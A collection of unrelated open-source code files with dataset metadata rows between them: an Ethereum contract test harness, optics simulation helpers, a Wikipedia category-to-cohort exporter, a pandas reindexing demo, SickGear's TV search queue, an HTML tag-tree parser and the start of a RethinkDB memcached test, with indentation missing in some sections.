self.block.gas_limit = 10 ** 9
def __del__(self):
shutil.rmtree(self.temp_data_dir)
def contract(self, code, sender=k0, endowment=0):
evm = serpent.compile(code)
print('>>> contract() evm type = {}'.format(type(evm)))
print('>>> contract() evm = {}'.format(evm))
o = self.evm(evm, sender, endowment)
assert len(self.block.get_code(o)), "Contract code empty"
return o
def contract_from_evm(self, evm, sender=k0, endowment=0):
print('>>> contract_from_evm() evm type = {}'.format(type(evm)))
o = self.evm(evm, sender, endowment)
assert len(self.block.get_code(o)), "Contract code empty"
return o
def abi_contract(me, code, sender=k0, endowment=0):
class _abi_contract():
def __init__(self, _state, code, sender=k0, endowment=0):
evm = serpent.compile(code)
self.address = me.evm(evm, sender, endowment)
assert len(me.block.get_code(self.address)), \
"Contract code empty"
sig = serpent.mk_signature(code)
sig = sig[sig.find('[')+1:sig.rfind(']')].split(',')
for i, s in enumerate(sig):
fun = s[:s.find(':')].strip()
funsig = s[s.find(':')+1:].strip()
def kall_factory(fun, funsig):
def kall(*abi, **kwargs):
if len(funsig) != len(abi):
raise Exception("Wrong number of arguments!")
for typ, val in zip(funsig, abi):
typ2 = 'i' if isinstance(val, (int, long)) else \
's' if isinstance(val, (str, unicode)) else \
'a' if isinstance(val, list) else 'err'
if typ != typ2:
raise Exception('Type mismatch!')
return _state.send(kwargs.get('sender', k0),
self.address,
kwargs.get('value', 0),
funid=i, abi=abi)
return kall
vars(self)[fun] = kall_factory(fun, funsig)
return _abi_contract(me, code, sender, endowment)
def evm(self, evm, sender=k0, endowment=0):
sendnonce = self.block.get_nonce(u.privtoaddr(sender))
tx = t.contract(sendnonce, 1, gas_limit, endowment, evm)
tx.sign(sender)
(s, a) = pb.apply_transaction(self.block, tx)
if not s:
raise Exception("Contract creation failed")
return a
def send(self, sender, to, value, data=[], funid=None, abi=None):
sendnonce = self.block.get_nonce(u.privtoaddr(sender))
if funid is not None:
evmdata = serpent.encode_abi(funid, *abi)
else:
evmdata = serpent.encode_datalist(*data)
tx = t.Transaction(sendnonce, 1, gas_limit, to, value, evmdata)
self.last_tx = tx
tx.sign(sender)
(s, r) = pb.apply_transaction(self.block, tx)
if not s:
raise Exception("Transaction failed")
o = serpent.decode_datalist(r)
return map(lambda x: x - 2 ** 256 if x >= 2 ** 255 else x, o)
def profile(self, sender, to, value, data=[], funid=None, abi=None):
tm, g = time.time(), self.block.gas_used
o = self.send(sender, to, value, data, funid, abi)
zero_bytes = self.last_tx.data.count(chr(0))
non_zero_bytes = len(self.last_tx.data) - zero_bytes
intrinsic_gas_used = opcodes.GTXDATAZERO * zero_bytes + \
opcodes.GTXDATANONZERO * non_zero_bytes
return {
"time": time.time() - tm,
"gas": self.block.gas_used - g - intrinsic_gas_used,
"output": o
}
def mkspv(self, sender, to, value, data=[], funid=None, abi=None):
sendnonce = self.block.get_nonce(u.privtoaddr(sender))
if funid is not None:
evmdata = serpent.encode_abi(funid, *abi)
else:
evmdata = serpent.encode_datalist(*data)
tx = t.Transaction(sendnonce, 1, gas_limit, to, value, evmdata)
self.last_tx = tx
tx.sign(sender)
return spv.mk_transaction_spv_proof(self.block, tx)
def verifyspv(self, sender, to, value, data=[],
funid=None, abi=None, proof=[]):
sendnonce = self.block.get_nonce(u.privtoaddr(sender))
if funid is not None:
evmdata = serpent.encode_abi(funid, *abi)
else:
evmdata = serpent.encode_datalist(*data)
tx = t.Transaction(sendnonce, 1, gas_limit, to, value, evmdata)
self.last_tx = tx
tx.sign(sender)
return spv.verify_transaction_spv_proof(self.block, tx, proof)
def trace(self, sender, to, value, data=[]):
# collect log events (independent of loglevel filters)
recorder = LogRecorder()
self.send(sender, to, value, data)
return recorder.pop_records()
def mine(self, n=1, coinbase=a0):
for i in range(n):
self.block.finalize()
t = self.block.timestamp + 6 + rand() % 12
self.block = b.Block.init_from_parent(self.block, coinbase, '', t)
self.blocks.append(self.block)
def snapshot(self):
return self.block.serialize()
def revert(self, data):
self.block = b.Block.deserialize(self.db, data)
# logging
def set_logging_level(lvl=1):
trace_lvl_map = [
':info',
'eth.vm.log:trace',
':info,eth.vm.log:trace,eth.vm.exit:trace',
':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace',
':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,' +
'eth.vm.storage:trace,eth.vm.memory:trace'
]
configure_logging(config_string=trace_lvl_map[lvl])
print 'Set logging level: %d' % lvl
def set_log_trace(logger_names=[]):
"""
sets all named loggers to level 'trace'
attention: vm.op.* are only active if vm.op is active
"""
for name in logger_names:
assert name in slogging.get_logger_names()
slogging.set_level(name, 'trace')
def enable_logging():
set_logging_level(1)
def disable_logging():
set_logging_level(0)
gas_limit = 1000000
| mit | 3,399,322,480,247,476,700 | 33.431111 | 84 | 0.553763 | false | 3.377071 | false | false | false |
TheLartians/PyPropagate | pypropagate/presets/boundaries.py | 1 | 2618 |
def set_1D_boundary_condition(settings):
from expresso.pycas import exp
s = settings.simulation_box
pe = settings.partial_differential_equation
pe.u_boundary = pe.u0.subs(s.z,s.zmin) * exp(pe.F.subs(s.z,s.zmin)*s.z)
def set_plane_wave_initial_conditions(settings):
"""Sets the boundary conditions to a plane wave with intensity 1.
The boundary are set to the index of refraction at z=0."""
s = settings.simulation_box
pe = settings.partial_differential_equation
pe.u0 = 1
set_1D_boundary_condition(settings)
def add_padding(array,factor,mode = 'edge',**kwargs):
import numpy as np
from ..coordinate_ndarray import CoordinateNDArray
padding_points = [[int(x*factor)]*2 for x in array.data.shape]
new_data = np.pad(array.data,padding_points,mode,**kwargs)
extension = [d*p[0] for d,p in zip(array._dbounds,padding_points)]
new_bounds = [(b-i,e+i) for i,(b,e) in zip(extension,array.bounds)]
return CoordinateNDArray(new_data,new_bounds,array.axis,array.evaluate)
def set_initial(settings,initial_array):
import expresso.pycas as pc
from ..coordinate_ndarray import CoordinateNDArray
if isinstance(initial_array,CoordinateNDArray):
initial = pc.array("initial",initial_array.data)
else:
initial = pc.array("initial",initial_array)
sb = settings.simulation_box
if tuple(initial_array.axis) == (sb.x,):
settings.partial_differential_equation.u0 = initial(sb.xi)
elif tuple(initial_array.axis) == (sb.x,sb.y):
settings.partial_differential_equation.u0 = initial(sb.yi,sb.xi)
sb.Ny = initial_array.shape[1]
if isinstance(initial_array,CoordinateNDArray):
sb.unlock('ymin')
sb.unlock('ymax')
sb.unlock('sy')
sb.ymin = initial_array.bounds[1][0]
sb.ymax = initial_array.bounds[1][1]
sb.sy = sb.ymax - sb.ymin
sb.lock('ymin','defined by initial array')
sb.lock('ymax','defined by initial array')
sb.lock('sy','defined by ymin and ymax')
else:
raise ValueError('initial array axis must be (x,) or (x,y)')
sb.Nx = initial_array.shape[0]
if isinstance(initial_array,CoordinateNDArray):
sb.unlock('xmin')
sb.unlock('xmax')
sb.unlock('sx')
sb.xmin = initial_array.bounds[0][0]
sb.xmax = initial_array.bounds[0][1]
sb.sx = sb.xmax - sb.xmin
sb.lock('xmin','defined by initial array')
sb.lock('xmax','defined by initial array')
sb.lock('sx','defined by xmin and xmax')
| gpl-3.0 | 7,768,564,459,612,533,000 | 32.564103 | 75 | 0.641329 | false | 3.431193 | false | false | false |
danmichaelo/wm_metrics | wm_metrics/cat2cohort.py | 2 | 2568 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Export a Wiki category into a cohort.
The aim of this script is to allow program leaders to export a category
filled with User pages into a WikiMetrics cohort CSV file in order to
perform their evaluation analysis.
Test:
python cat2cohort.py -l fr -c "Utilisateur participant au projet Afripédia"
"""
import mw_api
import mw_util
def api_url(lang):
"""Return the URL of the API based on the language of Wikipedia."""
return "https://%s.wikipedia.org/w/api.php" % lang
def list_users(mw, category, lang):
"""List users from a wiki category and print lines of the cohort CSV."""
list_query = mw_api.MwApiQuery(properties={
"list": "categorymembers",
"cmtitle": category,
"cmprop": "ids|title|timestamp",
"cmtype": "page",
"cmsort": "sortkey",
"cmdir": "asc",
"cmlimit": "max"
})
for page in mw.process_query(list_query):
if ":" in page['title']:
username = page['title'].split(":")[1]
yield (username, lang)
def cat_to_cohort(language, category):
"""Return the CSV cohort from the given category and language."""
mw = mw_api.MwWiki(url_api=api_url(language))
user_list = list_users(mw, mw_util.str2cat(category), language)
csv_text = _userlist_to_CSV_cohort(user_list)
return csv_text
def _userlist_to_CSV_cohort(user_list):
"""Return the given user list as a CSV cohort."""
return '\n'.join([_make_CSV_line(username, language)
for (username, language) in user_list])
def _make_CSV_line(username, language):
"""Return a WikiMetrics compatible CSV line."""
return "%s, %swiki" % (username, language)
def main():
"""Main function of the script cat2cohort."""
from argparse import ArgumentParser
description = "Export a Wiki category into a cohort"
parser = ArgumentParser(description=description)
parser.add_argument("-c", "--category",
type=str,
dest="category",
metavar="CAT",
required=True,
help="The wiki category to export")
parser.add_argument("-l", "--lang",
type=str,
dest="lang",
metavar="LANG",
required=True,
help="Wiki language")
args = parser.parse_args()
print cat_to_cohort(args.lang, args.category)
if __name__ == "__main__":
main()
| mit | -4,253,803,989,498,470,400 | 28.848837 | 79 | 0.586677 | false | 3.88351 | false | false | false |
lamontu/data-analysis | pandas/reindexing.py | 1 | 1202 | # -*- coding: utf-8 -*-
import numpy as np
from pandas import DataFrame, Series
print("## Redesignate index and order:")
obj = Series([4.5, 7.2, -5.3, 3.6], index=['d', 'b', 'a', 'c'])
print(obj)
obj2 = obj.reindex(['a', 'b', 'd', 'c', 'e'])
print(obj2)
print("### fill with specified value if the index not exist:")
obj3 = obj.reindex(['a', 'b', 'd', 'c', 'e'], fill_value=0)
print(obj3)
print()
print("## Redesignate index and fill method:")
obj4 = Series(['blue', 'purple', 'yellow'], index=[0, 2, 4])
print(obj4)
print(obj4.reindex(range(6), method='ffill'))
print()
print("## Redesignate index of DataFrame:")
frame = DataFrame(np.arange(9).reshape(3, 3),
index = ['a', 'c', 'd'],
columns = ['Ohio', 'Texas', 'California'])
print(frame)
frame2 = frame.reindex(['a', 'b', 'c', 'd'])
print(frame2)
print()
print("## Redesignate column:")
states = ['Texas', 'Utah', 'California']
print(frame.reindex(columns=states))
print()
print("## Redesignate index of DataFrame and fill method:")
print(frame.reindex(index = ['a', 'b', 'c', 'd'],
method = 'ffill',
columns = states))
print(frame.ix[['a', 'b', 'd', 'c'], states])
| gpl-3.0 | 3,242,217,310,844,328,000 | 29.05 | 63 | 0.578203 | false | 2.889423 | false | true | false |
adam111316/SickGear | sickbeard/search_queue.py | 3 | 17877 | # Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickGear.
#
# SickGear is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickGear is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickGear. If not, see <http://www.gnu.org/licenses/>.
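"""Search queue for SickGear.

Defines the SEARCHQUEUE generic queue and the queue items it processes:
recent, backlog, manual, failed and proper searches.
"""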
from __future__ import with_statement
import time
import traceback
import threading
import datetime
import sickbeard
from sickbeard import db, logger, common, exceptions, helpers, network_timezones, generic_queue, search, \
failed_history, history, ui, properFinder
from sickbeard.search import wantedEpisodes
search_queue_lock = threading.Lock()
BACKLOG_SEARCH = 10
RECENT_SEARCH = 20
FAILED_SEARCH = 30
MANUAL_SEARCH = 40
PROPER_SEARCH = 50
MANUAL_SEARCH_HISTORY = []
MANUAL_SEARCH_HISTORY_SIZE = 100
class SearchQueue(generic_queue.GenericQueue):
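    """Serialises all search work; the underlying generic queue runs one item at a time."""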
def __init__(self):
generic_queue.GenericQueue.__init__(self)
self.queue_name = 'SEARCHQUEUE'
def is_in_queue(self, show, segment):
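        """Return True if a backlog item for this show and segment is already queued."""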
with self.lock:
for cur_item in self.queue:
if isinstance(cur_item, BacklogQueueItem) and cur_item.show == show and cur_item.segment == segment:
return True
return False
def is_ep_in_queue(self, segment):
with self.lock:
for cur_item in self.queue:
if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and cur_item.segment == segment:
return True
return False
def is_show_in_queue(self, show):
with self.lock:
for cur_item in self.queue:
if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and cur_item.show.indexerid == show:
return True
return False
def get_all_ep_from_queue(self, show):
with self.lock:
ep_obj_list = []
for cur_item in self.queue:
if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and str(cur_item.show.indexerid) == show:
ep_obj_list.append(cur_item)
if ep_obj_list:
return ep_obj_list
return False
def pause_backlog(self):
with self.lock:
self.min_priority = generic_queue.QueuePriorities.HIGH
def unpause_backlog(self):
with self.lock:
self.min_priority = 0
def is_backlog_paused(self):
        # backlog items run at NORMAL priority, so pausing raises min_priority above them
with self.lock:
return self.min_priority >= generic_queue.QueuePriorities.NORMAL
def _is_in_progress(self, itemType):
with self.lock:
for cur_item in self.queue + [self.currentItem]:
if isinstance(cur_item, itemType):
return True
return False
def is_manualsearch_in_progress(self):
        # only referenced in webserve.py; reports any queued or currently running manual/failed search
return self._is_in_progress((ManualSearchQueueItem, FailedQueueItem))
def is_backlog_in_progress(self):
return self._is_in_progress(BacklogQueueItem)
def is_recentsearch_in_progress(self):
return self._is_in_progress(RecentSearchQueueItem)
def is_propersearch_in_progress(self):
return self._is_in_progress(ProperSearchQueueItem)
def is_standard_backlog_in_progress(self):
with self.lock:
for cur_item in self.queue + [self.currentItem]:
if isinstance(cur_item, BacklogQueueItem) and cur_item.standard_backlog:
return True
return False
def type_of_backlog_in_progress(self):
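        """Return a readable summary of the backlog types (Limited/Full/On Demand) queued or running."""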
limited = full = other = False
with self.lock:
for cur_item in self.queue + [self.currentItem]:
if isinstance(cur_item, BacklogQueueItem):
if cur_item.standard_backlog:
if cur_item.limited_backlog:
limited = True
else:
full = True
else:
other = True
types = []
for msg, variant in ['Limited', limited], ['Full', full], ['On Demand', other]:
if variant:
types.append(msg)
message = 'None'
if types:
message = ', '.join(types)
return message
def queue_length(self):
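        """Return a dict summarising queued and running items for each search type."""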
length = {'backlog': [], 'recent': 0, 'manual': [], 'failed': [], 'proper': 0}
with self.lock:
for cur_item in [self.currentItem] + self.queue:
if isinstance(cur_item, RecentSearchQueueItem):
length['recent'] += 1
elif isinstance(cur_item, BacklogQueueItem):
                    length['backlog'].append([cur_item.show.indexerid, cur_item.show.name, cur_item.segment,
                                              cur_item.standard_backlog, cur_item.limited_backlog, cur_item.forced])
elif isinstance(cur_item, ProperSearchQueueItem):
length['proper'] += 1
elif isinstance(cur_item, ManualSearchQueueItem):
length['manual'].append([cur_item.show.indexerid, cur_item.show.name, cur_item.segment])
elif isinstance(cur_item, FailedQueueItem):
length['failed'].append([cur_item.show.indexerid, cur_item.show.name, cur_item.segment])
return length
def add_item(self, item):
if isinstance(item, (RecentSearchQueueItem, ProperSearchQueueItem)):
# recent and proper searches
generic_queue.GenericQueue.add_item(self, item)
elif isinstance(item, BacklogQueueItem) and not self.is_in_queue(item.show, item.segment):
# backlog searches
generic_queue.GenericQueue.add_item(self, item)
elif isinstance(item, (ManualSearchQueueItem, FailedQueueItem)) and not self.is_ep_in_queue(item.segment):
# manual and failed searches
generic_queue.GenericQueue.add_item(self, item)
else:
logger.log(u'Not adding item, it\'s already in the queue', logger.DEBUG)
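# Typical producer usage (sketch - actual call sites live in webserve.py and in
# the scheduler wiring; the scheduler attribute name is assumed from there):
#   sickbeard.searchQueueScheduler.action.add_item(RecentSearchQueueItem())
#   sickbeard.searchQueueScheduler.action.add_item(BacklogQueueItem(show, segment))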
class RecentSearchQueueItem(generic_queue.QueueItem):
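    """Queue item for the scheduled recent search across all enabled providers."""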
def __init__(self):
self.success = None
self.episodes = []
generic_queue.QueueItem.__init__(self, 'Recent Search', RECENT_SEARCH)
def run(self):
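        """Mark newly aired episodes wanted, refresh provider caches, then search and snatch."""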
generic_queue.QueueItem.run(self)
try:
self._change_missing_episodes()
self.update_providers()
show_list = sickbeard.showList
fromDate = datetime.date.fromordinal(1)
for curShow in show_list:
if curShow.paused:
continue
self.episodes.extend(wantedEpisodes(curShow, fromDate))
if not self.episodes:
logger.log(u'No search of cache for episodes required')
self.success = True
else:
num_shows = len(set([ep.show.name for ep in self.episodes]))
logger.log(u'Found %d needed episode%s spanning %d show%s'
% (len(self.episodes), helpers.maybe_plural(len(self.episodes)),
num_shows, helpers.maybe_plural(num_shows)))
try:
logger.log(u'Beginning recent search for episodes')
found_results = search.searchForNeededEpisodes(self.episodes)
if not len(found_results):
logger.log(u'No needed episodes found')
else:
for result in found_results:
                        # snatch each of the results found (one per needed episode)
logger.log(u'Downloading %s from %s' % (result.name, result.provider.name))
self.success = search.snatchEpisode(result)
# give the CPU a break
time.sleep(common.cpu_presets[sickbeard.CPU_PRESET])
except Exception:
logger.log(traceback.format_exc(), logger.DEBUG)
if self.success is None:
self.success = False
finally:
self.finish()
@staticmethod
def _change_missing_episodes():
if not network_timezones.network_dict:
network_timezones.update_network_dict()
if network_timezones.network_dict:
curDate = (datetime.date.today() + datetime.timedelta(days=1)).toordinal()
else:
curDate = (datetime.date.today() - datetime.timedelta(days=2)).toordinal()
curTime = datetime.datetime.now(network_timezones.sb_timezone)
myDB = db.DBConnection()
sqlResults = myDB.select('SELECT * FROM tv_episodes WHERE status = ? AND season > 0 AND airdate <= ?',
[common.UNAIRED, curDate])
sql_l = []
show = None
wanted = False
for sqlEp in sqlResults:
try:
if not show or int(sqlEp['showid']) != show.indexerid:
show = helpers.findCertainShow(sickbeard.showList, int(sqlEp['showid']))
                    # for when there are orphaned series in the database but not loaded into our showlist
if not show:
continue
except exceptions.MultipleShowObjectsException:
logger.log(u'ERROR: expected to find a single show matching ' + str(sqlEp['showid']))
continue
try:
end_time = network_timezones.parse_date_time(sqlEp['airdate'], show.airs, show.network) + datetime.timedelta(minutes=helpers.tryInt(show.runtime, 60))
# filter out any episodes that haven't aired yet
if end_time > curTime:
continue
            except Exception:
# if an error occurred assume the episode hasn't aired yet
continue
ep = show.getEpisode(int(sqlEp['season']), int(sqlEp['episode']))
with ep.lock:
                # Now that it has aired, flip the UNAIRED episode to WANTED (or SKIPPED if the show is paused)
ep.status = (common.WANTED, common.SKIPPED)[ep.show.paused]
result = ep.get_sql()
if None is not result:
sql_l.append(result)
                wanted |= (common.WANTED == ep.status)
else:
logger.log(u'No unaired episodes marked wanted')
        if sql_l:
myDB = db.DBConnection()
myDB.mass_action(sql_l)
if wanted:
logger.log(u'Found new episodes marked wanted')
@staticmethod
def update_providers():
origThreadName = threading.currentThread().name
threads = []
logger.log('Updating provider caches with recent upload data')
providers = [x for x in sickbeard.providers.sortedProviderList() if x.is_active() and x.enable_recentsearch]
for curProvider in providers:
# spawn separate threads for each provider so we don't need to wait for providers with slow network operation
threads.append(threading.Thread(target=curProvider.cache.updateCache, name=origThreadName +
' :: [' + curProvider.name + ']'))
# start the thread we just created
threads[-1].start()
# wait for all threads to finish
for t in threads:
t.join()
logger.log('Finished updating provider caches')
class ProperSearchQueueItem(generic_queue.QueueItem):
def __init__(self):
generic_queue.QueueItem.__init__(self, 'Proper Search', PROPER_SEARCH)
self.priority = generic_queue.QueuePriorities.HIGH
self.success = None
def run(self):
generic_queue.QueueItem.run(self)
try:
properFinder.searchPropers()
finally:
self.finish()
class ManualSearchQueueItem(generic_queue.QueueItem):
def __init__(self, show, segment):
generic_queue.QueueItem.__init__(self, 'Manual Search', MANUAL_SEARCH)
self.priority = generic_queue.QueuePriorities.HIGH
self.name = 'MANUAL-' + str(show.indexerid)
self.success = None
self.show = show
self.segment = segment
self.started = None
def run(self):
generic_queue.QueueItem.run(self)
try:
logger.log('Beginning manual search for: [' + self.segment.prettyName() + ']')
self.started = True
searchResult = search.searchProviders(self.show, [self.segment], True)
if searchResult:
# just use the first result for now
logger.log(u'Downloading ' + searchResult[0].name + ' from ' + searchResult[0].provider.name)
self.success = search.snatchEpisode(searchResult[0])
# give the CPU a break
time.sleep(common.cpu_presets[sickbeard.CPU_PRESET])
else:
ui.notifications.message('No downloads were found',
'Couldn\'t find a download for <i>%s</i>' % self.segment.prettyName())
logger.log(u'Unable to find a download for: [' + self.segment.prettyName() + ']')
except Exception:
logger.log(traceback.format_exc(), logger.DEBUG)
finally:
            # Keep a list of the last 100 executed searches
fifo(MANUAL_SEARCH_HISTORY, self, MANUAL_SEARCH_HISTORY_SIZE)
if self.success is None:
self.success = False
self.finish()
class BacklogQueueItem(generic_queue.QueueItem):
def __init__(self, show, segment, standard_backlog=False, limited_backlog=False, forced=False):
generic_queue.QueueItem.__init__(self, 'Backlog', BACKLOG_SEARCH)
self.priority = generic_queue.QueuePriorities.LOW
self.name = 'BACKLOG-' + str(show.indexerid)
self.success = None
self.show = show
self.segment = segment
self.standard_backlog = standard_backlog
self.limited_backlog = limited_backlog
self.forced = forced
def run(self):
generic_queue.QueueItem.run(self)
try:
logger.log('Beginning backlog search for: [' + self.show.name + ']')
searchResult = search.searchProviders(self.show, self.segment, False)
if searchResult:
for result in searchResult:
                    # snatch every result found for this backlog segment
logger.log(u'Downloading ' + result.name + ' from ' + result.provider.name)
search.snatchEpisode(result)
# give the CPU a break
time.sleep(common.cpu_presets[sickbeard.CPU_PRESET])
else:
logger.log(u'No needed episodes found during backlog search for: [' + self.show.name + ']')
except Exception:
logger.log(traceback.format_exc(), logger.DEBUG)
finally:
self.finish()
class FailedQueueItem(generic_queue.QueueItem):
def __init__(self, show, segment):
generic_queue.QueueItem.__init__(self, 'Retry', FAILED_SEARCH)
self.priority = generic_queue.QueuePriorities.HIGH
self.name = 'RETRY-' + str(show.indexerid)
self.show = show
self.segment = segment
self.success = None
self.started = None
def run(self):
generic_queue.QueueItem.run(self)
self.started = True
try:
for epObj in self.segment:
logger.log(u'Marking episode as bad: [' + epObj.prettyName() + ']')
failed_history.markFailed(epObj)
(release, provider) = failed_history.findRelease(epObj)
if release:
failed_history.logFailed(release)
history.logFailed(epObj, release, provider)
failed_history.revertEpisode(epObj)
logger.log('Beginning failed download search for: [' + epObj.prettyName() + ']')
searchResult = search.searchProviders(self.show, self.segment, True)
if searchResult:
for result in searchResult:
                    # snatch every result found for the retried episodes
logger.log(u'Downloading ' + result.name + ' from ' + result.provider.name)
search.snatchEpisode(result)
# give the CPU a break
time.sleep(common.cpu_presets[sickbeard.CPU_PRESET])
else:
pass
#logger.log(u"No valid episode found to retry for: [" + self.segment.prettyName() + "]")
except Exception:
logger.log(traceback.format_exc(), logger.DEBUG)
finally:
            # Keep a list of the last 100 executed searches
fifo(MANUAL_SEARCH_HISTORY, self, MANUAL_SEARCH_HISTORY_SIZE)
if self.success is None:
self.success = False
self.finish()
def fifo(myList, item, maxSize=100):
if len(myList) >= maxSize:
myList.pop(0)
myList.append(item)
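# Editor sketch (hedged, not part of the original module): illustrates fifo()'s
# bounded-history behaviour with a throwaway list.
#   history = []
#   for i in range(105):
#       fifo(history, i, maxSize=100)
#   assert len(history) == 100 and history[0] == 5  # first 5 items were popped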
| gpl-3.0 | 3,014,968,864,450,407,000 | 37.611231 | 179 | 0.578565 | false | 4.336972 | false | false | false |
MERegistro/meregistro | meregistro/apps/registro/forms/ExtensionAulicaModificarCueForm.py | 1 | 1137 | # -*- coding: utf-8 -*-
from django.forms import ModelForm
from apps.registro.models import ExtensionAulica, Establecimiento
from apps.registro.forms import ExtensionAulicaCreateForm
from django.core.exceptions import ValidationError
from django import forms
class ExtensionAulicaModificarCueForm(ExtensionAulicaCreateForm):
class Meta:
model = ExtensionAulica
fields = ['codigo_tipo_unidad_educativa', 'cue', 'codigo_jurisdiccion']
def __init__(self, *args, **kwargs):
super(ExtensionAulicaModificarCueForm, self).__init__(*args, **kwargs)
self.fields['norma_creacion'].required = False
def clean(self):
        # Assemble the CUE correctly
cleaned_data = self.cleaned_data
try:
cue = str(cleaned_data['cue'])
codigo_jurisdiccion = cleaned_data['codigo_jurisdiccion']
codigo_tipo_unidad_educativa = cleaned_data['codigo_tipo_unidad_educativa']
cleaned_data['cue'] = str(codigo_jurisdiccion) + str(cue) + str(codigo_tipo_unidad_educativa)
except KeyError:
pass
return cleaned_data
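        # Editor note (hedged): the resulting CUE is the concatenation
        # <codigo_jurisdiccion><cue><codigo_tipo_unidad_educativa>; e.g. the
        # illustrative inputs ('06', '1234', '00') would yield '06123400'.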
| bsd-3-clause | 2,083,545,406,543,251,000 | 34.53125 | 105 | 0.672823 | false | 3.520124 | false | false | false |
svarnypetr/focusWebCrawler | parser.py | 1 | 5517 | from HTMLParser import HTMLParser
from htmlentitydefs import name2codepoint
class Tag(object):
name = ''
text = ''
first_child = 0
parent = 0
next_sibling = 0
closed = 0
depth = 0
def get_tag_info_str(self):
c, p, s = 'none', 'none', 'none'
if self.first_child != 0:
c = self.first_child.name
if self.parent != 0:
p = self.parent.name
if self.next_sibling != 0:
s = self.next_sibling.name
return "name = {}, text = {}\nParent = {}, First Child = {}, Next Sibling = {}\nClosed = {}, Depth = {}\n".format(self.name, self.text, p, c, s, self.closed, self.depth)
class MyHTMLParser(HTMLParser):
tag_list = []
depth = 0
previous_tag = 'none'
mode = 'silent'
def handle_starttag(self, tag, attrs):
if self.mode != 'silent':
print "Start tag:", tag
for attr in attrs:
print " attr:", attr
self.depth = self.depth + 1
t = Tag()
t.name = tag
t.depth = self.depth
if self.previous_tag == 'start':
# current tag is a first child of the last tag
t.parent = self.tag_list[len(self.tag_list)-1]
self.tag_list[len(self.tag_list)-1].first_child = t
elif self.previous_tag == 'end':
# current tag is next sibling of the last tag
for x in reversed(self.tag_list):
if x.depth == self.depth:
x.next_sibling = t
if t.parent == 0:
t.parent = x.parent
break
elif self.previous_tag == 'startend':
# current tag is the next sibling of the previous tag
t.parent = self.tag_list[len(self.tag_list)-1].parent
self.tag_list[len(self.tag_list)-1].next_sibling = t
self.tag_list.append(t)
self.previous_tag = 'start'
def handle_endtag(self, tag):
if self.mode != 'silent':
print "End tag :", tag
for x in reversed(self.tag_list):
if x.name == tag and x.closed == 0:
x.closed = 1
break
self.depth = self.depth - 1
self.previous_tag = 'end'
def handle_startendtag(self, tag, attrs):
if self.mode != 'silent':
print "Start/End tag :", tag
for attr in attrs:
print " attr:", attr
t = Tag()
self.depth = self.depth + 1
t.name = tag
t.depth = self.depth
t.closed = 1
if self.previous_tag == 'start':
# current tag is first child of the last tag
t.parent = self.tag_list[len(self.tag_list)-1]
self.tag_list[len(self.tag_list)-1].first_child = t
elif self.previous_tag == 'startend':
# current tag is next sibling of last tag
t.parent = self.tag_list[len(self.tag_list)-1].parent
self.tag_list[len(self.tag_list)-1].next_sibling = t
elif self.previous_tag == 'end':
            # current tag is the next sibling of a previous tag at the same depth (depth == self.depth)
for x in reversed(self.tag_list):
if x.depth == self.depth:
x.next_sibling = t
if t.parent == 0:
t.parent = x.parent
break
self.tag_list.append(t)
self.depth = self.depth - 1
self.previous_tag = 'startend'
def handle_data(self, data):
if self.mode != 'silent':
print "Data :", data
self.depth = self.depth + 1
# add data to last tag in list with depth = current depth - 1
for x in reversed(self.tag_list):
if x.depth == self.depth - 1:
x.text = (x.text + ' ' + data.strip(' \n\t')).strip(' \n\t')
break
self.depth = self.depth - 1
def handle_comment(self, data):
if self.mode != 'silent':
print "Comment :", data
def handle_entityref(self, name):
if self.mode != 'silent':
c = unichr(name2codepoint[name])
print "Named ent:", c
def handle_charref(self, name):
if self.mode != 'silent':
if name.startswith('x'):
c = unichr(int(name[1:], 16))
else:
c = unichr(int(name))
print "Num ent :", c
def handle_decl(self, data):
if self.mode != 'silent':
print "Decl :", data
def print_tag_list(self, u):
for l in self.tag_list:
print l.get_tag_info_str()
def clear_tag_list(self):
        del self.tag_list[:]
def pretty_print_tags(self):
for t in self.tag_list:
s = ''
s = s + self.get_indent_str(t.depth-1)
s = s + self.get_tag_str(t.name)
print s
    def get_indent_str(self, n):
        # one space of indentation per level of tag depth
        return ' ' * n
def get_tag_str(self, name):
return '<{}>'.format(name)
def find_first_tag(self, name):
r = 0
for t in self.tag_list:
if t.name == name:
r = t
break
return r
def print_first_tag_info(self, name):
t = self.find_first_tag(name)
if t == 0:
print "Tag: {} not found".format(name)
else:
print t.get_tag_info_str()
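if __name__ == '__main__':
    # Editor sketch (hedged, not in the original module): a quick demo of the
    # parent/first_child/next_sibling tree that MyHTMLParser builds.
    p = MyHTMLParser()
    p.feed('<html><body><p>hi</p></body></html>')
    p.pretty_print_tags()           # prints an indented <tag> outline
    p.print_first_tag_info('p')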
| mit | 821,630,544,457,962,000 | 30.525714 | 177 | 0.496828 | false | 3.707661 | false | false | false |
1N50MN14/rethinkdb | test/memcached_workloads/rget_no_blocking.py | 4 | 4069 | #!/usr/bin/python
# Copyright 2010-2012 RethinkDB, all rights reserved.
import os, sys, socket, random, time
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, "common")))
import memcached_workload_common
from line import *
key_padding = ''.zfill(20)
def gen_key(prefix, num):
return prefix + key_padding + str(num).zfill(6)
value_padding = ''.zfill(240)
large_value_padding = ''.zfill(512)
def gen_value(prefix, num):
if num % 5 == 4:
return prefix + large_value_padding + str(num).zfill(6)
else:
return prefix + value_padding + str(num).zfill(6)
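# Editor note (hedged): keys and values are zero-padded to fixed widths so that
# lexicographic order matches numeric order, e.g. gen_key('foo', 7) yields
# 'foo' + 20 zeros + '000007'; every 5th value uses the larger 512-byte padding.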
def sock_readline(sock_file):
ls = []
while True:
l = sock_file.readline()
ls.append(l)
if len(l) >= 2 and l[-2:] == '\r\n':
break
return ''.join(ls)
